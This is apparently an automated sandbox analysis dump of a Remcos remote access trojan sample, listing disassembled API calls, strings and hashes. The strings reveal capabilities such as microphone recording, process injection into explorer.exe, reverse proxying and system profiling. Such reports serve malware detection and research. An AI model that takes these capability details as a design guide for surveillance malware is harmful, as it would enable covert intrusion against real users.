                                                    • API String ID: 0-1267037602
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                    Strings
                                                    • API ID: LongNamePath
                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                    • API String ID: 82841172-425784914
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                    • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                    • __dosmaperr.LIBCMT ref: 004393DD
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                    • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                    • __dosmaperr.LIBCMT ref: 0043941A
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                    • __dosmaperr.LIBCMT ref: 0043946E
                                                    • _free.LIBCMT ref: 0043947A
                                                    • _free.LIBCMT ref: 00439481
                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                    • String ID:
                                                    • API String ID: 2441525078-0
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                    • __alloca_probe_16.LIBCMT ref: 004499F2
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                    • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                    • __freea.LIBCMT ref: 00449B47
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • __freea.LIBCMT ref: 00449B50
                                                    • __freea.LIBCMT ref: 00449B75
                                                    Strings
                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3864826663-3232713500
                                                    APIs
                                                    • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                    • TranslateMessage.USER32(?), ref: 00404F30
                                                    • DispatchMessageA.USER32(?), ref: 00404F3B
                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                    • API String ID: 2956720200-749203953
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                    Strings
                                                    • API ID: DecodePointer
                                                    • String ID: Zb1Y/$acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-939709183
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                    • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                    • String ID: <$@$@FG$@FG$Temp
                                                    • API String ID: 1107811701-2245803885
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Roaming\eaJOpx.exe), ref: 00406705
                                                    Strings
                                                    • API ID: CurrentProcess
                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                    • API String ID: 2050909247-4145329354
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    • API String ID: 221034970-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00446DEF
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00446DFB
                                                    • _free.LIBCMT ref: 00446E06
                                                    • _free.LIBCMT ref: 00446E11
                                                    • _free.LIBCMT ref: 00446E1C
                                                    • _free.LIBCMT ref: 00446E27
                                                    • _free.LIBCMT ref: 00446E32
                                                    • _free.LIBCMT ref: 00446E3D
                                                    • _free.LIBCMT ref: 00446E48
                                                    • _free.LIBCMT ref: 00446E56
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00447ECC
                                                    • _free.LIBCMT ref: 00447EF0
                                                    • _free.LIBCMT ref: 00448077
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    • _free.LIBCMT ref: 00448243
                                                    Strings
                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 314583886-3232713500
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                    • _free.LIBCMT ref: 00444724
                                                    • _free.LIBCMT ref: 0044473D
                                                    • _free.LIBCMT ref: 0044476F
                                                    • _free.LIBCMT ref: 00444778
                                                    • _free.LIBCMT ref: 00444784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                    • String ID: C$Zb1Y/
                                                    • API String ID: 1679612858-1916750779
                                                    • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                    • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                    • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                    • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Eventinet_ntoa
                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                    • API String ID: 3578746661-4192532303
                                                    • Opcode ID: 3b117b629b3bdaa18b774d6fa515516e8e6a044dc87e94f0a9700addc1d69c3b
                                                    • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                    • Opcode Fuzzy Hash: 3b117b629b3bdaa18b774d6fa515516e8e6a044dc87e94f0a9700addc1d69c3b
                                                    • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                    • __fassign.LIBCMT ref: 0044A190
                                                    • __fassign.LIBCMT ref: 0044A1AB
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                    • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                    • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1324828854-3232713500
                                                    • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                    • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                    • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                    • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • Sleep.KERNEL32(00000064), ref: 00416688
                                                    • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                    • API String ID: 1462127192-2001430897
                                                    • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                    • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                    • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                    • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                    APIs
                                                    • _strftime.LIBCMT ref: 00401AD3
                                                      • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                    • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                    • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                    • API String ID: 3809562944-3643129801
                                                    • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                    • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                    • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                    • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                    • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                    • waveInStart.WINMM ref: 00401A81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                    • String ID: XCG$`=G$x=G
                                                    • API String ID: 1356121797-903574159
                                                    • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                    • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                    • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                    • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                      • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                      • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                      • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                    • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                    • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                    • TranslateMessage.USER32(?), ref: 0041CA0B
                                                    • DispatchMessageA.USER32(?), ref: 0041CA15
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                    • String ID: Remcos
                                                    • API String ID: 1970332568-165870891
                                                    • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                    • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                    • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                    • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                    • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                    • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                    • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16
                                                    • String ID: Zb1Y/$a/p$am/pm$fD
                                                    • API String ID: 3509577899-3962523610
                                                    • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                    • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                    • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                    • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tcp$udp
                                                    • API String ID: 0-3725065008
                                                    • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                    • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                    • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                    • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                    APIs
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • _free.LIBCMT ref: 00444096
                                                    • _free.LIBCMT ref: 004440AD
                                                    • _free.LIBCMT ref: 004440CC
                                                    • _free.LIBCMT ref: 004440E7
                                                    • _free.LIBCMT ref: 004440FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID: Z7D$Zb1Y/
                                                    • API String ID: 3033488037-2760453993
                                                    • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                    • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                    • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                    • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                    • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: Zb1Y/$csm
                                                    • API String ID: 1170836740-1781008971
                                                    • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                    • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                    • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                    • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                      • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                      • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                    • String ID: .part
                                                    • API String ID: 1303771098-3499674018
                                                    • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                    • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                    • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                    • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                    APIs
                                                      • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                      • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                      • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                    • _wcslen.LIBCMT ref: 0041A906
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                    • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                    • API String ID: 37874593-703403762
                                                    • Opcode ID: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                    • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                    • Opcode Fuzzy Hash: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                    • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                    APIs
                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                      • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                    • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentOpenProcessQueryValue
                                                    • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                    • API String ID: 1866151309-3211212173
                                                    • Opcode ID: 9b9183aef67563fec3e0b5301fe16ff2c459ff8b00ce5db537e54f339134e2ff
                                                    • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                    • Opcode Fuzzy Hash: 9b9183aef67563fec3e0b5301fe16ff2c459ff8b00ce5db537e54f339134e2ff
                                                    • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                    APIs
                                                    • SendInput.USER32 ref: 00418B18
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                      • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
